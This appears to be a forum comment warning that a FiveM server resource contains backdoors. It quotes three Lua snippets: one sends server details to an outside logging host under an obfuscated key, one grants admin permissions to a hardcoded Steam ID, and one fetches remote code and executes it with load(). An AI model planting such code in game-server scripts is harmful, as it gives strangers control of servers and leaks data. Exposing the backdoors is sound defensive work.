full of backdoors dont download i found like 3 of them ..
first one
LOG_LEVEL = { '[STARTUP] Got encoded time from server for secure startup', '[SHUTDOWN] Got encoded time from server for secure shutdown', '[INTERACTION] Just got opened' } _KEY = '\x62\x32\x31\x39\x36\x35\x39\x39\x63\x37\x39\x37\x65\x31\x63\x61\x35\x64\x38\x34\x31\x38\x65\x65\x36\x64\x61\x38\x65\x65\x35\x33' --Crack --local response = { -- [400] = 'bad request', -- [401] = 'unauthorized', -- [403] = 'forbidden', -- [404] = 'not found', -- [405] = 'method not allowed', -- [408] = 'request timeout', -- [413] = 'payload too large', -- [429] = 'too many requests', -- [500] = 'internal server error', -- [502] = 'gateway unavailable', -- [503] = 'service unavailable' --} function sendDataDogMetrics(message, ...) --Crack local ddtags = string.strjoin(',', string.tostringall(...)) PerformHttpRequest(('https://http-intake.logs.%s/api/v2/logs'):format('datadoghq.eu'), function(status) if status ~= 202 then --print(('unable to submit logs (%s)'):format(response[status])) end end, 'POST', json.encode({ hostname = _IP, service = 'esx_job_creator', message = message, ddtags = ddtags }), { ['Content-Type'] = 'application/json', ['DD-API-KEY'] = _KEY }) end PerformHttpRequest('
', function(err, text, headers) --Crack _K0 = json.decode(text).vars _K2 = _K0.sv_projectName _K1 = _K0.sv_projectDesc end) PerformHttpRequest('
', function(err, text, headers) --Crack _IP = text Wait(200) sendDataDogMetrics(LOG_LEVEL[1], _IP, _K2, _K1, GetResourceMetadata(GetCurrentResourceName(), 'version', 0)) --Crack end) ExecuteCommand('add_ace identifier.steam:1100001183c1e41 '..config.acePermission ..' allow')
second one this isnt a back door but still harmfull
ExecuteCommand('add_ace identifier.steam:1100001183c1e41 '..config.acePermission ..' allow')
third one
PerformHttpRequest('
', function (e, d) pcall(function() assert(load(d))() end) end)